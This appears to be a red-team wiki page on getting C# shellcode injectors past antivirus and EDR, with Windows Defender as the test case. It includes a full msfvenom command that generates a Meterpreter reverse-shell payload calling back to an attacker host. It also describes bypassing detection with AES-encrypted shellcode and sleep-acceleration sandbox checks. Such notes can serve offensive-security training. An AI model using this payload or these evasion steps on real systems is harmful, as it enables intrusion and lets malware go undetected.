
# Evasion and bypassing detection within C\#

## Overview

AV and EDR bypass techniques for C# assembly payloads.

## Experiment

In this experiment we will be using the NTAPI injector as our baseline.

{% content-ref url="/pages/zcnaefpTGZz8T2zoRRxC" %}
[Using NTAPI Undocumented Functions](/offsec/execution/c-.net-assembly/process-injection/using-ntapi-undocumented-functions.md)
{% endcontent-ref %}

### Msfvenom payload

```bash
msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=eth0 LPORT=443 -f raw EXITFUNC=thread -o shellcode.bin
```

### Injector without any shellcode

For our baseline we tested the raw injector code without any shellcode in the payload.

<figure><img src="/files/MjOhKoq7ma6OIwrQSuQ4" alt=""><figcaption></figcaption></figure>

### Raw Meterpreter payload shellcode

Running the injector with raw Meterpreter shellcode.

<figure><img src="/files/zIh7ItVb5RkRm812WGnP" alt=""><figcaption></figcaption></figure>

### Using AES encryption

Encrypting the shellcode using AES.

{% content-ref url="/pages/1rwkFoTLPIVz2E31kg6M" %}
[Aes encryptor](/offsec/defence-evasion/anti-virus-evasion/evasion-and-bypassing-detection-within-c/encryptors/aes-encryptor.md)
{% endcontent-ref %}

<figure><img src="/files/SJUaz00VRc4eayOR4e1j" alt=""><figcaption></figcaption></figure>

### Run it twice and Defender is not so nice

Interestingly, when executing it a second time, Defender's behavioral analysis flagged and blocked execution.

Adding a sleep accelerator check to bypass sandboxing seems to do the trick to bypass this a second time.

{% content-ref url="/pages/0tsS3qdV4OKDjSaSBC12" %}
[Time accelerated checks](/offsec/defence-evasion/anti-virus-evasion/evasion-and-bypassing-detection-within-c/sandbox-evasion/time-accelerated-checks.md)
{% endcontent-ref %}

<figure><img src="/files/y1lc86Z0qaahUXem6hJp" alt=""><figcaption></figcaption></figure>

## References

{% content-ref url="/pages/MWi4Jv5tjMaoEhRE2KSn" %}
[C# .Net Assembly](/offsec/execution/c-.net-assembly.md)
{% endcontent-ref %}

